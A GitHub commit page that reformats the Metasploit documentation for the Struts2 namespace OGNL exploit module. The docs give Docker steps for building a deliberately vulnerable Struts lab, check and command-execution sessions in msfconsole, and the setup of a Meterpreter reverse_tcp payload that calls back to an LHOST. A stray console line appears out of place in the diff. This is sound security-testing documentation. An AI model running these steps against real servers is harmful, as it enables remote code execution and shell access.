Skip to content

Commit

Permalink
Reformat the struts2_namespace_ognl module docs
Browse files Browse the repository at this point in the history
  • Loading branch information
@zeroSteiner
zeroSteiner committed Dec 15, 2020
1 parent fc70173 commit 246c455
Showing 1 changed file with 98 additions and 86 deletions.
184 changes: 98 additions & 86 deletions documentation/modules/exploit/multi/http/struts2_namespace_ognl.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -10,90 +10,102 @@ As a result of the lack of OGNL output, we currently cannot support large payloa

## Vulnerable Application

The Struts showcase app, with a slight adaptation to introduce the vulnerability, works reliabliy as a practice environment.
*@hook-s3c* did an amazing job with [their writeup](https://github.com/hook-s3c/CVE-2018-11776-Python-PoC/blob/master/README.md), which I'll include exerpts of here:

1. From a stock Ubuntu VM, install docker:
```
sudo apt update && sudo apt install docker.io
```

2. Download a vulnerable Struts showcase application inside a docker container:
```
sudo docker pull piesecurity/apache-struts2-cve-2017-5638
sudo docker run -d --name struts2 -p 32771:8080 piesecurity/apache-struts2-cve-2017-5638
CONTAINER_ID=`sudo docker ps -l -q`
```

3. Now that the container is running, open a terminal inside of it:
```
sudo docker exec -it $CONTAINER_ID /bin/bash
```

4. From within the container, install your text editor of choice and modify the Struts configs:
```
sudo apt update && sudo apt install nano
nano /usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts.xml
```

5. Update the struts config to add this to above line #11:
```
<constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
```

6. Update the same struts config file to add this above line #78:
```
<action name="help">
<result type="redirectAction">
<param name="actionName">date.action</param>
</result>
</action>
```

7. Still within the container, shutdown the environment:
```
/usr/local/tomcat/bin/shutdown.sh
```

8. Upon completion, the container will shutdown and you'll return to the host environment. Restart the container, now with a vulnerable endpoint:
The Struts showcase app, with a slight adaptation to introduce the vulnerability, works reliabliy as a practice environment.
*@hook-s3c* did an amazing job with [their writeup](https://github.com/hook-s3c/CVE-2018-11776-Python-PoC/blob/master/README.md), which I'll include exerpts of here:

1. From a stock Ubuntu VM, install docker:

```
sudo apt update && sudo apt install docker.io
```

2. Download a vulnerable Struts showcase application inside a docker container:

```
sudo docker pull piesecurity/apache-struts2-cve-2017-5638
sudo docker run -d --name struts2 -p 32771:8080 piesecurity/apache-struts2-cve-2017-5638
CONTAINER_ID=`sudo docker ps -l -q`
```

3. Now that the container is running, open a terminal inside of it:

```
sudo docker exec -it $CONTAINER_ID /bin/bash
```

4. From within the container, install your text editor of choice and modify the Struts configs:

```
sudo apt update && sudo apt install nano
nano /usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts.xml
```

5. Update the struts config to add this to above line #11:

```
&lt;constant name=&quot;struts.mapper.alwaysSelectFullNamespace&quot; value=&quot;true&quot; /&gt;
```

6. Update the same struts config file to add this above line #78:

```
&lt;action name=&quot;help&quot;&gt;
&lt;result type=&quot;redirectAction&quot;&gt;
&lt;param name=&quot;actionName&quot;&gt;date.action&lt;/param&gt;
&lt;/result&gt;
&lt;/action&gt;
```

7. Still within the container, shutdown the environment:

```
/usr/local/tomcat/bin/shutdown.sh
```

8. Upon completion, the container will shutdown and you'll return to the host environment. Restart the container, now with a vulnerable endpoint:
msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134
```
sudo docker start $CONTAINER_ID
```

Congratulations. You now have a vulnerable Struts server. If you're following these instructions, your server should be listening on 0.0.0.0:32771. To confirm:
```
INTERFACE=`ip route list 0.0.0.0/0 | cut -d' ' -f5`
IPADDRESS=`ip addr show $INTERFACE | grep -Po 'inet \K[\d.]+'`
PORT_NUM=`sudo docker port $CONTAINER_ID | sed 's/.*://'`
echo "Struts container is listening on $IPADDRESS:$PORT_NUM"
```

```
sudo docker start $CONTAINER_ID
```

Congratulations. You now have a vulnerable Struts server. If you're following these instructions, your server should be listening on 0.0.0.0:32771. To confirm:

```
INTERFACE=`ip route list 0.0.0.0/0 | cut -d' ' -f5`
IPADDRESS=`ip addr show $INTERFACE | grep -Po 'inet \K[\d.]+'`
PORT_NUM=`sudo docker port $CONTAINER_ID | sed 's/.*://'`
echo "Struts container is listening on $IPADDRESS:$PORT_NUM"
```

## Verification Steps

Confirm that check functionality works:

- [ ] Install the application using the steps above.
- [ ] Start msfconsole.
- [ ] Load the module: ```use exploit/multi/http/struts_namespace_ognl```
- [ ] Load the module: `use exploit/multi/http/struts_namespace_ognl`
- [ ] Set the RHOST.
- [ ] Set an invalid ACTION: ```set ACTION wrong.action```
- [ ] Confirm the target is *not* vulnerable: ```check```
- [ ] Observe that the target is *not* vulnerable: ```The target is not exploitable.```
- [ ] Set a valid ACTION: ```set ACTION help.action```
- [ ] Confirm that the target is vulnerable: ```The target is vulnerable.```
- [ ] Set an invalid ACTION: `set ACTION wrong.action`
- [ ] Confirm the target is *not* vulnerable: `check`
- [ ] Observe that the target is *not* vulnerable: `The target is not exploitable.`
- [ ] Set a valid ACTION: `set ACTION help.action`
- [ ] Confirm that the target is vulnerable: `The target is vulnerable.`

Confirm that command execution functionality works:
- [ ] Set a payload: ```set PAYLOAD cmd/unix/generic```
- [ ] Set a command to be run: ```set CMD hostname```
- [ ] Run the exploit: ```run```
- [ ] Confirm the output is the container ID of your docker environment, e.g: ```b3d9b350d9b6```

- [ ] Set a payload: `set PAYLOAD cmd/unix/generic`
- [ ] Set a command to be run: `set CMD hostname`
- [ ] Run the exploit: `run`
- [ ] Confirm the output is the container ID of your docker environment, e.g: `b3d9b350d9b6`
- [ ] You will not be given a shell (yet).

Confirm that payload upload and execution works:
- [ ] Set a payload, e.g.: ```set PAYLOAD linux/x64/meterpreter/reverse_tcp```

- [ ] Set a payload, e.g.: `set PAYLOAD linux/x64/meterpreter/reverse_tcp`
- [ ] Configure `LHOST` and `RHOST` as necessary.
- [ ] Run the exploit: ```run```
msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134
- [ ] Run the exploit: `run`

## Options

**TARGETURI**
Expand All @@ -108,23 +120,23 @@ msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134

### Version of software and OS as applicable

Checking a vulnerable endpoint, as installed in the above steps:
Checking a vulnerable endpoint, as installed in the above steps:

```
msf > use exploit/multi/http/struts_namespace_ognl
msf5 exploit(multi/http/struts_namespace_ognl) > set RHOSTS 192.168.199.135
msf5 exploit(multi/http/struts_namespace_ognl) > set RPORT 32771
msf5 exploit(multi/http/struts_namespace_ognl) > set ACTION help.action
ACTION => help.action
msf5 exploit(multi/http/struts_namespace_ognl) > check
[+] 192.168.199.135:32771 The target is vulnerable.
```
```
msf > use exploit/multi/http/struts_namespace_ognl
msf5 exploit(multi/http/struts_namespace_ognl) > set RHOSTS 192.168.199.135
msf5 exploit(multi/http/struts_namespace_ognl) > set RPORT 32771
msf5 exploit(multi/http/struts_namespace_ognl) > set ACTION help.action
ACTION => help.action
msf5 exploit(multi/http/struts_namespace_ognl) > check
[+] 192.168.199.135:32771 The target is vulnerable.
```

Running an arbitrary command on the above-described environment:
Running an arbitrary command on the above-described environment:

```
msf5 exploit(multi/http/struts_namespace_ognl) > set VERBOSE true
msf5 exploit(multi/http/struts_namespace_ognl) > set PAYLOAD cmd/unix/generic
```
msf5 exploit(multi/http/struts_namespace_ognl) > set VERBOSE true
msf5 exploit(multi/http/struts_namespace_ognl) > set PAYLOAD cmd/unix/generic
PAYLOAD => cmd/unix/generic
msf5 exploit(multi/http/struts_namespace_ognl) > set CMD hostname
CMD => hostname
Expand All @@ -136,9 +148,9 @@ b3d9b350d9b6
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/struts_namespace_ognl) >
```
```

Getting a Meterpreter session on the above-described environment:
Getting a Meterpreter session on the above-described environment:

```
Expand Down

0 comments on commit 246c455

Please sign in to comment.